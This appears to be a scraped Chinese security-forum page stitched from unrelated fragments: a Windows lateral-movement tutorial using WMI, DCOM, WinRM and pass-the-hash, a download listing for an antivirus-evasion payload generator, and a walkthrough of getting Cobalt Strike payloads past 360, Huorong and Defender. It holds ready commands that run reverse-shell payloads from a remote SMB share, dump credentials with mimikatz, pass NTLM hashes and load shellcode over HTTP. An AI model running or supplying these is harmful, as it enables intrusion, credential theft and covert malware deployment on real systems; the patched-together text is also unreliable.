1、远程主机的WMI服务为开启状态(默认开启) 2、远程主机防火墙放行135端口,这是WMI管理的默认端口 常规利用方法在windows上可以通过wmic.exe和powershell cmelet来使用wmi数据和执行WMI方法。 wmic.exe是一个与WMI进行交互的命令行工具,拥有大量的WMI对象的默认别名,可以执行许多复杂的查询。powershell也提供了许多可以与WMI进行交互的cmelet,如Invoke-WmiMethod、Set-WmiInstance等 执行远程查询 通过WMI查询远程主机上运行的进程信息 wmic /node:192.168.1.131 /user:Administrator /password:123qwe@ process list brief # /node 执行远程主机的地址 创建远程进程 通过调用Win32_Process.Create方法在远程主机上创建进程,启动CMD来执行命令 由于WMIC在执行命令时没有回显,因此可以将执行结果写入文件,然后通过别的方式读取文件 wmic /node:192.168.1.131 /user:Administrator /password:123qwe@ process call create "cmd.exe /c ipconfig > C:\result.txt" 远程安装MSI文件 通过调用Win32_Product.Install方法,可以控制远程主机安装恶意MSI文件,从而获得权限 wmic /node:192.168.1.131 /user:Administrator /password:123qwe@ product call install PackageLocation="\\192.168.1.1\mysmb\reverse_tcp.msi" 常见利用工具套件impacket-WmiExecImpacket项目的Wmiexec.py能够以全交互或半交互的方式,通过WMI在远程主机上执行命令。该工机需要远程主机开启135和445端口,其中445端口用于传输命令执行的回显。 python wmiexec.py uf9n1x/Administrator:123qwe@@192.168.1.131 wmiexec.exe ./administrator:123qwe@@192.168.1.131 "whoami" wmiexec.exe god/administrator:[email protected] "whoami" wmiexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./[email protected] "whoami" wmiexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 uf9n1x/[email protected] "whoami" 自带 cscript 明文传递 有回显cscript //nologo wmiexec.vbs /shell 192.168.1.131 administrator 123qwe@ 自带 WMIC 明文传递 无回显wmic /node:192.168.1.131 /user:administrator /password:123qwe@ process call create "cmd.exe /c ipconfig >C:\1.txt" WMI事件订阅的利用WMI提供了强大的事件处理系统,几乎可以用于操作系统上发生的任何事件做出相应。 当创建某进程时,通过WMI事件订阅器来执行预先设置的脚本。 其中触发事件的具体条件被称为“事件过滤器”(Event Filter),如用户登录、新进程创建等;对指定事件发生做出相应的称为“事件消费者”(Event Consumer),包括一系列具体的操作,如运行脚本、记录日志、发送邮件等。 在部署事件订阅时,需要分别构建Filter和Consumer两部分,并将两者绑定在一起。 所有的事件过滤器都被存储在一个Root\subscription:__EventFiilter对象的实例,可以通过创建__EventFilter对象实例来部署事件过滤器。事件消费者是基于ROOT\subscription:__EventConsumer系统类派生来的类。 系统提供了常用的标准事件消费类 LogFileEventConsumer # 将事件数据写入指定的日志文件 ActiveScriptEventConsumer # 执行嵌入的VBScript或JavaScript NTEventLogEventConsumer # 创建一个包含事件数据的事件日志条目 SMTPEventConsumer # 发送一封包含事件数据的电子邮件 CommandLineEventConsumer # 执行指定的系统命令 Sharp-WMIEvent https://github.com/wh0Nsq/Sharp-WMIEvent 在远程主机上部署一个随即命名的永久事件订阅,并每隔60s执行以此SMB共享中的攻击载荷 Sharp-WMIEvent -Trigger Interval -IntervalPeriod 60 -ComputerName 192.168.1.131 -Domain uf9n1x.com -Username Administrator -Password 123qwe@ DCOM的利用COM(Component Object Model,组件对象模型)是微软的一套软件组成的二进制接口标准,使得跨编程语言的进程间通信、动态对象创建成为可能。COM指定了一个对象模型和编程要求,使COM对象能够与其他对象交互。这些对象可以在单个进程中,也可以在其它进程中,甚至可以在远程计算机中。在Windows中,每个COM对象都由唯一的128位的二进制标识符标识,即GUID。 DCOM(Distracted Component Model,分布式组件对象模型)是基于COM的一系列概念和程序接口,支持不同机器上的组件间通信。利用DCOM,客户端程序对象可以请求来自网络中另一台计算机上的服务器程序对象。 部分DCOM组件公开的接口中可能包含不安全的方法。执行以下命令,可以列出计算机上所有的DCOM程序组件 Get-CimInstance Win32_DCOMApplication 目前常利用的DCOM组件有:MMC20.Application、ShellWindows、Excel.Application、ShellBrowserWindow等。 使用DCOM在远程主机上面执行命令,需要具有以下条件: 具有管理员权限的PowerShell 可能需要关闭目标系统的防火墙。 在远程主机上执行命令时,必须使用域管的administrator账户或者目标主机具有管理员权限的账户 MMC20.ApplicationMMC20.Application对象的Document.ActiveView下存在一个ExecuteShellCommand方法,可以用来启动子进程并运行执行的程序或系统命令。 # 通过progID与DCOM进行远程交互,并创建MMC20.Application对象的示例 $com =[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.1.131")) # 调用ExecuteShellCommand方法启动进程,运行攻击载荷 $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c \\192.168.1.1\mysmb\reverse_tcp.exe", "Minimized") # 合并一句话 [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.1.131")).Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c \\192.168.1.1\mysmb\reverse_tcp.exe", "Minimized") ShellWindowsShellWindows组件提供了Document.Application.ShellExecute方法,适用于Windows7及以上的系统。 # 通过PowerShell与DCOM进行远程交互,创建ShellWindows对象的实例: $com=[Activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.1 .131")) # 然后执行如下命令,我们就可以调用该对象的"ShellExecute"方法在远程主机上启动进程: $com.item().Document.Application.ShellExecute("cmd.exe","/c C:\shell.exe","c:\windows\system32",$null,0) # 完整的命令: [Activator]::CreateInstance([Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.1.131")).item().Document.Application.ShellExecute("cmd.exe","/c C:\shell.exe","c:\windows\system32",$null,0) Excel.Application# 通过PowerShell与DCOM进行远程交互,创建Excel.Application对象的实例: $com = [activator]::CreateInstance([type]::GetTypeFromprogID("Excel.Application","192.168.1.131")) $com.DisplayAlerts = $false # 然后执行如下命令,我们就可以调用该对象的"DDEInitiate"方法在远程主机上启动进程: $com.DDEInitiate("cmd.exe","/c C:\shell.exe") ShellBrowserWindow使用条件:适用于Windows 10和Windows Server 2012 R2等版本的系统。 # 通过PowerShell与DCOM进行远程交互,创建Excel.Application对象的实例: $com = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","192.168.1.131")) # 然后执行如下命令,我们就可以调用该对象的"shellExecute"方法在远程主机上启动进程: $com.Document.Application.shellExecute("C:\shell.exe") # 完整的命令: [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","192.168.1.131")).Document.Application.shellExecute("C:\shell.exe") Impacket里的dcomexec.py脚本Impacket 里面提供的 dcomexec.py 脚本可以提供一个类似于 wmiexec.py 脚本的半交互式shell,但使用的是DCOM,目前支持MMC20.Application,ShellWindows和ShellBrowserWindow对象。 命令格式如下: ./dcomexec.py domain/username:password@ip ./dcomexec.py domain/username:password@ip <command> WinRM的利用WinRM是通过执行WS-Management协议(用于远程软件和硬件管理的Web服务协议)来实现远程管理的,允许处于一个共同网络内的Windows计算机彼此之间互相访问和交换信息,对应的端口是5985。在一台计算机启用WinRM服务后,防火墙会自动放行其相关通信端口,在另一台计算机便能通过WinRM对其进行远程管理了。 只有在Windows Server 2008以上版本的服务器中,WinRm服务才会自动启动。 在利用WinRM进行横向移动时,需要拥有远程主机的管理员凭据信息。 通过WinRM执行远程命令Windows远程管理提供了两个工具: ① Winrs,允许远程执行命令的命令行工具,利用了WS-Manage协议 ② Winrm(Winrm.cmd),内置系统管理命令行工具,允许管理员配置本机的WinRM服务。 在默认情况下,无法通过WinRM连接到目标系统。可能出现错误:Winrs error:WinRM客户端无法处理该请求。可以将默认身份验证与IP地址结合使用: ① 传输为HTTPS或目标位于TrustedHosts列表中,并且提供显式凭据 ② 使用Winrm.cmd配置TrustedHosts。 执行以下命令,将目标地址添加到TrustedHosts中: winrm set winrm/config/client @{TrustedHosts="192.168.1.1"} set-Item WSMan:localhost\client\trustedhosts -value * # 通过powershell,信任所有主机 Winrswinrs是Windows上远程管理提供的客户端程序,允许通过提供的用户凭据,在运行WinRM的服务器上执行命令。要求通信双方都安装了WinRM服务。 # 执行系统命令 winrs -r:http://192.168.1.131:5985 -u:Administrator -p:123qwe@ "whoami" # 获取远程交互式命令行 winrs -r:http://192.168.1.131:5985 -u:Administrator -p:123qwe@ "cmd" Winrm.cmdwinrm.cmd允许WMI对象通过WinRm传输进行远程交互,在本地或远程计算机上枚举WMI对象实例或调用WMI类方法。比如可以通过调用Win32_Process类的Create方法来创建远程实例。 winrm invoke create wmicimv2/win32_process -SkipCAcheck -skipCNcheck @{commandline="notepad.exe"} -r:http://192.168.1.131:5985 -u:Administrator -p:123qwe@ Evil-Winrmhttps://github.com/Hackplayers/evil-winrm PTH&PTK&PTT(hash、key、ticket传递)PTH(pass the hash) #利用 LM 或 NTLM 的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试 PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试 PTH和PTK PTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,PsExec 无法利用获得的 ntlm hash 进行远程连接,但是使用 mimikatz 还是可以攻击成功。对于 8.1/2012r2,安装补丁 kb2871997 的 Win 7/2008r2/8/2012 等,可以使用 AES keys 代替 NT hash 来实现 ptk 攻击 # mimikatz privilege::debug # NTLM sekurlsa::logonPasswords # AES sekurlsa::ekeys 总结:KB2871997 补丁后的影响 https://www.freebuf.com/column/220740.html PTH:打补丁前任意用户都可以连接,打了补丁后只能 administrator 用户才可以连接 PTK:打补丁前不能连接,打补丁后才能任意用户都可以连接(采用 aes256 连接) PTT-票据传递 PTT 攻击的部分就不是简单的 NTLM 认证了,它是利用 Kerberos 协议进行攻击的,三种常见的攻击方法: MS14-068,Golden ticket,SILVER ticket。简单来说就是将连接合法的票据注入到内存中实现连接。 Golden ticket(黄金票据),SILVER ticket(白银票据)属于权限维持技术 MS14-068 基于漏洞,造成的危害是允许域内任何一个普通用户,将自己提升至域管权限。微软给出的补丁是 kb3011780 PTH利用Mimikatz进行PTHMimikatz内置了哈希传递的功能,需要本地管理员权限。 ① 抓取用户的哈希 mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit ② 利用抓取的域管理员的NTLM hash进行哈希传递 mimikatz.exe "privilege::debug" "sekurlsa::pth /user:Administrator /domain:uf9n1x.com /ntlm:93b95aef15f4d50fab96ffc44a2f326a" exit 利用impacket进行PTHImpacket项目中具有远程执行功能的几个脚本几乎都可以进行哈希传递攻击,常见的有: psexec.py # 类似PSEXEC的功能示例,使用remcomsvc(https://github.com/kavika13/remcom) smbexec.py # 与使用remcomsvc的psexec w/o类似的方法。这里描述了该技术。我们的实现更进一步, #实例化本地smbserver以接收命令的输出。这在目标计算机没有可写共享可用的情况下很有用。 python3 smbexec.py -hashes :3617ad523f47fc96f24c45943affd954 [email protected] #-hashes 指定用户完整的哈希,如果LM哈希被废弃,就将其指定为0或者空 atexec.py # 此示例通过Task Scheduler服务在目标计算机上执行命令,并返回已执行命令的输出。 wmiexec.py # 需要开放139和445端口,通过Windows Management Instrumentation使用的半交互式shell,它不需要在目标服务器上安装任何服务/代理,以管理员身份运行,非常隐蔽。 python wmiexec.py -hashes 00000000000000000000000000000:3617ad523f47fc96f24c45943affd954 [email protected] dcomexec.py # 类似于wmiexec.py的半交互式shell,但使用不同的DCOM端点。目前支持 MMC20.Application,ShellWindows和ShellBrowserWindow对象。 用法: # 普通用法 python3 xxx.py domain/user:password@ip # 哈希传递 python3 xxx.py domain/user@ip -hashes :93b95aef15f4d50fab96ffc44a2f326a PTK aes256 传递打补丁后的工作组及域连接: sekurlsa::pth /user:webserver-2008 /domain:uf9n1x /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b PTT 票据传递需要先了解kerberos认证原理,及金票银票等,放在下一篇讨论
  29. 你们都是用的哪里的服务器?或者vps?如果有的话,可以推荐或者参考一下?
    • 15次下载
    • 版本 1.0.0
    可以过360、火绒等主流杀软。改良版2025最新版可以联系我们进行下载(团队内部安全测试自用。)依赖 具体使用教程:如果使用工具的全部功能,请确保满足以下全部条件: 64位Windows 7或以上操作系统 .net Framework 4.5 或更高版本 安装 tdm-gcc 或者 tcc 任选:安装64位Go语言环境 tdm-gcc下载地址,运行一次,选择CREATE,然后一直“下一步”即可。 tcc下载地址,这个不需要安装,解压到任意目录即可(目录不包含中文字符)。 使用程序现在不会自动检测编译器了,而是使用了 YRconfig.ini 。在正式使用之前,你需要更改该文件的内容。格式参考如下: [编译器] GCC="C:\TDM-GCC-64\bin\gcc.exe" GO="C:\Go\bin\go.exe" 将对应 gcc.exe 和 go.exe 的路径替换成你自己的,然后重启主程序就可以使用了。 从20231208版本以后,你可以自己选择c编译器:tdm-gcc或者tcc。tcc生成的体积更小(实测7kb,使用upx可以压到5kb以内),但是不支持自定义程序图标。 生成路径中不要包含中文和空格,否则会生成失败! 针对Cobalt Strike,不要选择生成Windows分阶段木马、Windows无阶段木马,而是生成payload,最终是一个payload.c文件。
  30. 将对应 gcc.exe 和 go.exe 的路径替换成你自己的,然后重启主程序就可以使用了。 从20231208版本以后,你可以自己选择c编译器:tdm-gcc或者tcc。tcc生成的体积更小(实测7kb,使用upx可以压到5kb以内),但是不支持自定义程序图标。 生成路径中不要包含中文和空格,否则会生成失败! 针对Cobalt Strike,不要选择生成Windows分阶段木马、Windows无阶段木马,而是生成payload,最终是一个payload.c文件。 下载之后本地打开:(记得关闭杀软) 2. 环境配置 安装环境:Windows10虚拟机 在这里新版本掩日采用了gcc环境和go环境,在作者的项目介绍中,对其都有要求,我们按照要求分别安装gcc和go的环境: gcc安装 gcc --version go安装 go version 3. 环境 在作者的介绍中,针对Cobalt Strike生成的木马要求: 针对Cobalt Strike,不要选择生成Windows分阶段木马、Windows无阶段木马,而是生成payload,最终是一个payload.c文件。 因此在这里我们使用最常用的CS的木马来进行操作。 3.1 环境准备 在本地启动一个CS,服务端: sudo ./teamserver 10.30.1.147 123 启用客户端,并新增监听,在这里使用作者建议的HTTPS方式: 然后生成一个payload.c文件: 3.2 测试环境 测试机: Windows10 360主动防御 Windows7 火绒主动防御 Windows10 开启windows Defender 其中测试的杀软均升级到最新,并且关闭了自动上传样本的功能。 4. 免杀测试 4.1 通用免杀 在这里选择直接执行的方式,并且使用隐藏窗口的模式: 此时生成成功: 4.1.1 火绒(成功) 此时没有发现问题,上线测试: 4.1.2 360(成功) 关闭360的自动上传样本功能 然后按位置扫描,没有发现问题: 上线测试下,此时上线正常: 4.1.3 Windows Defender(失败) 此时的 Windows Defender病毒库为最新版本 静态测试 动态上线(被杀) 在上线之后,立刻被拦截查杀: 在这里可以发现,三个杀软中只有Windows Defender难过,因此针对它进一步进行测试: 在这里选择了加密方法,然后再去生成木马,但是发现过Windows Defender的时候,依旧被杀。 4.1.4 强力模式(成功) 在这里选择强力模式,作者对于强力模式的解释是拥有很好的免杀和反沙盒效果,但是耗时比较长,而且会消耗大量的CPU 此时静态查杀,依旧正常 动态上线正常: 4.2 分离免杀 在这里执行的时候,会生成两个文件,一个是不含shellcode的shellcode加载器,另外就是一个shellcode文件(可能经过了各种加密变形)。 此时生成了两个文件: 静态查杀正常: 动态加载: 动态加载的话,不是直接双击上线的,而是在命令行中,将exe加载,并且跟上分离文件的名称才可以:(此时没有杀软) 当有Windows Defender的时候: 直接被动态查杀,再试试其他的方式,发现全部被杀 4.3 网络分离 将生成的shellcode加载器放到目标机器上,并在目标机能访问到的机器上开启一个http服务: python3 -m http.server 802 然后在远程进行加载: dUu.exe http://10.30.1.147:802/dUu.txt 还是被Windows Defender杀了: 5. 总结 在整个掩日免杀项目中,可以看到功能比以前增加了很多,而且体验感变好,免杀能力也很强。 当然Windows Defender依旧是很难对抗的,很多情况下还是要看对方的环境是啥,不要一味地追求Bypass everyone!
    • 2次下载
    • 版本 1.0.0
    Windows免杀(也叫Windows绕过杀软)是指在Windows操作系统中,通过各种手段绕过或规避杀毒软件、反病毒工具或安全防护系统的检测,使恶意程序能够成功执行而不被检测或阻止。这种技术广泛应用于渗透测试、网络攻击、恶意软件开发和网络安全研究等领域。 免杀技术的核心目标是规避杀软的检测机制,以下是几种常见的免杀方式: 1. 代码混淆 • 通过改变恶意代码的结构、名称、参数、字符串等,来避免被已知的签名特征库检测到。混淆后的恶意程序功能不变,但它的外观或行为变得与原程序大不相同。 2. 加密与编码 • 将恶意程序进行加密或编码,使得其初始执行时不会被反病毒软件识别。一旦程序被执行,恶意行为才会发生。这类技术通常会使用多种加密算法,甚至是动态解密技术。 3. 反沙盒检测 • 反沙盒技术可以让恶意程序检测自己是否运行在虚拟环境中(例如,沙盒检测)。如果程序判断自己在沙盒环境中运行,可能会选择不执行恶意行为,从而避开检测。 4. 自删除或延时执行 • 恶意程序可以设计成在首次执行时自我删除或者延时激活恶意行为,目的是防止被即时检测。即便病毒进入系统,可能在某个延迟后才会表现出攻击行为。 5. 使用合法工具 • 有些攻击者会利用合法的系统工具(如PowerShell、WMI、Regsvr32等)执行恶意代码,因为这些工具本身被系统认为是“安全”的,不容易被杀软拦截。 6. 签名伪装 • 恶意软件可以伪造合法的数字签名,使得程序看起来像是来自可信的来源,绕过基于签名的检测机制。 7. 内存注入与进程注入 • 攻击者通过将恶意代码注入到正常进程的内存中执行,使得这些代码在正常进程的上下文中运行,避免了文件级别的检测。 8. 多态与变种技术 • 恶意程序使用变种技术,每次生成不同的样式(如多态病毒),从而让每次攻击的行为表现不同,难以被静态检测工具捕捉。 免杀技术的应用: • 渗透测试与红队:专业的安全测试人员可能会使用免杀技术来模拟真实攻击,评估网络防御的有效性。 • 黑客攻击:攻击者可能会通过免杀技术来避免被目标系统的安全软件拦截,成功植入恶意软件。 • 恶意软件开发:恶意软件开发者会利用免杀技术来绕过防病毒软件的监控,确保恶意软件可以在目标计算机上隐蔽运行。 防御措施: • 行为分析:许多现代的防病毒软件已经从传统的签名检测转向行为分析,能够识别不依赖签名的可疑活动。 • 沙盒技术:通过将程序放在一个虚拟的环境中运行,检测其是否有恶意行为。 • 白名单与黑名单:将可信的应用程序列入白名单,拒绝未知或不受信任的程序执行。 • 多重身份验证与数据加密:加强数据保护措施,即使恶意程序能够突破外围安全防护,也难以获取有价值的敏感信息。 在网络安全领域,免杀技术的应用是对抗和防御的核心之一。了解这些技术可以帮助安全专家加强防护策略,同时也提醒普通用户加强网络安全意识和工具的更新,防止遭遇攻击。